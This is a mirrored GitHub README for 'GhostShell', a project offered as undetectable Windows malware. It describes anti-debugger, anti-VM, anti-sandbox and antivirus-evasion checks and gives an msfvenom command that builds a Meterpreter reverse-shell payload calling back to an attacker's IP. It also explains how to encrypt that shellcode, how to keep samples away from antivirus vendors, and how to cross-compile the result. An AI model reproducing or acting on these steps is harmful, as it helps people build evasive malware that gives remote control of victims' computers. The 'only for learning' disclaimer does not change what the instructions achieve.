GithubHelp home page GithubHelp logo

marciopocebon / ghostshell Goto Github PK

View Code? Open in Web Editor NEW

This project forked from jakuta-tech/ghostshell

0.0 0.0 0.0 4.5 MB

Malware indetectable, with AV bypass techniques, anti-disassembly, etc.

License: MIT License

C 100.00%

ghostshell's Introduction

GhostShell

In this malware, are used some techniques to try bypass the AVs, VMs, and Sandboxes, with only porpuse to learning more. I'm not responsible for your actions.

license last-commit made-by size binary-size issues issues-closed

followers stars forks watchers

Bypass Techniques | Generating the Shellcode | How to compile for Windows on Linux | Credits | License

โš ๏ธ Atention!!!

To check if the antivirus is detecting the malware, NEVER send it to the virustotal, IT WILL BE SENT TO THE ANTIVIRUS COMPANIES AND WILL BE BROKEN, to analyze, send it to https://www.hybrid-analysis.com/ and remember to check the option "Do not send my sample to non-affiliated third parties", as in the example below.

๐Ÿ’ฃ Bypass Techniques

Anti-Debugger

To try bypass the Debuggers, I'm using the "IsDebuggerPresent()" of "Windows.h" librarie to checks if a debugger is running.

Anti-VM / Anti-Sandbox / Anti-AV

  • Enumerate Process Function

    Enumerates all process running on the system, and compares to the process in the black-list, if found a process and this is equal to any process in the black-list returns -1 (identified).

  • Sleep Acceleration Check Function

    First, gets the current time, and sleeps 2 minutes, then, gets the time again, and compare, if the difference is less than 2, returns -1 (identified).

  • Mac Address Check Function

    Gets the system mac address and compare to the macs, in the black-list, if the system mac address is equal to any mac in the black-list returns -1 (identified).

โ˜ข๏ธ Generating the Shellcode

Generating

To generate the shellcode type in the terminal: msfvenom -p windows/meterpreter/reverse_shell lhost=(IP) lport=(PORT) -f c, copy the shellcode generated and encrypt it.

To encrypt shellcode use the encrypt_shellcode script.
On linux type: ./encrypt_shellcode e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(shellcode)""
On windows type: encrypt_shellcode.exe e "(KEY, ex: "\xda\xe6\x1d\x5c\x9v\x8d") "(YOUR_SHELLCODE)""

๐Ÿ’ป How to compile for Windows on Linux

To compile for Windows on Linux, first, install mingw-w64: sudo apt-get install mingw-w64, then, to compile for 32 bits: i686-w64-mingw32-gcc -o main.exe main.c -l psapi -static, and to 64 bits: x86_64-w64-mingw32 -o main.exe main.c -l psapi -static

๐Ÿ“– Credits

Credits for https://github.com/rastating, the encrypt_shellcode is based on a post of your github.io: https://rastating.github.io/creating-a-shellcode-crypter/

๐Ÿ“ License

This project is under MIT license. See at here LICENSE for more informations.

> It is not ready yet!

ghostshell's People

Contributors

reddyyz avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.